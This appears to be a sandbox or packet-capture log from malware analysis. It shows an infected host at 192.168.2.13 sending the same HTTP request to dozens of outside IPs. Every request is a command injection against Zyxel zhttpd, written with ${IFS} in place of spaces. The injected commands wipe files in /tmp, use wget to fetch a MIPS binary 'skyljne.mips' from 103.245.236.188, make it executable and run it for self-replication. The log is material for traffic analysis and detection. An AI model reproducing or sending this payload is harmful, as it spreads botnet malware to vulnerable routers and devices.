                                                Jan 12, 2024 18:24:43.034532070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6112192.168.2.1342084137.84.78.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034574032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6113192.168.2.1340094167.219.178.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034617901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6114192.168.2.1349186191.3.216.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034672976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6115192.168.2.1358750125.219.110.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034703970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6116192.168.2.13398329.162.25.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034733057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6117192.168.2.134204878.252.234.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034759045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6118192.168.2.1357232101.234.206.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034799099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6119192.168.2.1355184200.217.170.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034842014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6120192.168.2.135358690.188.17.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034863949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6121192.168.2.1352920217.91.196.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034904003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6122192.168.2.136065249.252.214.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034959078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6123192.168.2.1351092137.37.78.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035001040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6124192.168.2.135129087.168.58.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035027027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6125192.168.2.135017499.68.181.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035064936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6126192.168.2.135760891.186.166.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035109997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6127192.168.2.1338440139.167.168.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035145998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6128192.168.2.1358992172.37.119.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035166979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6129192.168.2.13347945.36.225.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035202980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6130192.168.2.1343442140.111.220.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035249949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6131192.168.2.135555077.51.149.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035286903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6132192.168.2.134179467.107.224.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035355091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6133192.168.2.1352492207.156.235.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035391092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6134192.168.2.1353106185.174.156.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035413027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6135192.168.2.1332906157.126.192.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035459042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6136192.168.2.13488728.111.251.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035514116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6137192.168.2.134426823.164.8.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035547018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6138192.168.2.1355034105.216.219.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035583019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6139192.168.2.1340606154.141.126.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035640001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6140192.168.2.134447683.226.64.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035695076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6141192.168.2.1335952177.254.208.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035721064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6142192.168.2.134563678.206.172.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035782099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6143192.168.2.1345018120.133.56.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035805941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6144192.168.2.135474046.245.143.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035837889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6145192.168.2.1342288206.179.1.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035876989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6146192.168.2.135762057.105.123.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035907030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6147192.168.2.134424080.73.245.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035950899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6148192.168.2.1346614163.182.217.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.035983086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6149192.168.2.13522601.244.127.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036032915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6150192.168.2.1334464135.173.26.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036076069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6151192.168.2.1359224213.111.85.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036127090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6152192.168.2.1344480104.71.151.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036165953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6153192.168.2.1344808218.132.39.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036204100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6154192.168.2.135711246.27.109.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036242008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6155192.168.2.1346098119.243.217.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036276102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6156192.168.2.1341444216.85.25.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036324024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6157192.168.2.1338866194.141.6.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036365032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6158192.168.2.135744246.10.37.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036386013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6159192.168.2.1333660169.49.107.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036422014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6160192.168.2.1333732152.203.121.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036442995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6161192.168.2.134168820.41.166.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036484003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6162192.168.2.135898850.234.186.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036533117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6163192.168.2.1340712135.215.180.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036564112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6164192.168.2.135590049.244.95.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036614895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6165192.168.2.134575083.197.233.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036634922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6166192.168.2.1341388212.27.59.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036693096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6167192.168.2.135381482.85.11.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036745071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6168192.168.2.135691236.127.213.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036802053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6169192.168.2.134760060.248.32.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036807060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6170192.168.2.133356696.221.30.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036854029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6171192.168.2.133996096.77.53.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036883116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6172192.168.2.1357088114.29.244.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036917925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6173192.168.2.1342016182.101.125.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.036962986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6174192.168.2.1345098114.89.137.56443
                                                TimestampBytes transferredDirectionData
